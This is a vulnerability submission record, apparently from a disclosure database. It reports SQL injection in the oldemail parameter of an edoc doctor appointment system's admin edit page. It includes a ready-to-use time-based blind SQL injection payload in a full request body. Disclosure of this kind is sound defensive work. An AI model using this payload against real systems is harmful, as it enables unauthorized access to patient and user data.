Submit #95223: Sql injection exists for oldmail parameter of edoc doctor appointment systeminfo

TitleSql injection exists for oldmail parameter of edoc doctor appointment system
DescriptionSQL injection vulnerability exists in oldmail parameter of /admin/edit-doc.php file of edoc doctor appointment system Important user data or system data may be leaked and system security may be compromised.The environment is secure and the information can be used by malicious users. Payload:id00=1&oldemail=doctor@edoc.com' RLIKE SLEEP(5)-- ZZpV&email=123@123com&name=123&nic=123&Tele=123123123123&spec=1&password=123123&cpassword=123123
Source⚠️ https://github.com/E1CHO/cve_hub/blob/main/edoc%20doctor%20appointment%20system/edoc%20doctor%20appointment%20system%20vlun4.pdf
User
 SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874)
Submission02/27/2023 08:23 AM (2 years ago)
Moderation02/27/2023 12:08 PM (4 hours later)
StatusAccepted
VulDB Entry221825 [SourceCodester Doctors Appointment System 1.0 /admin/edit-doc.php email/oldmail sql injection]
Points20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!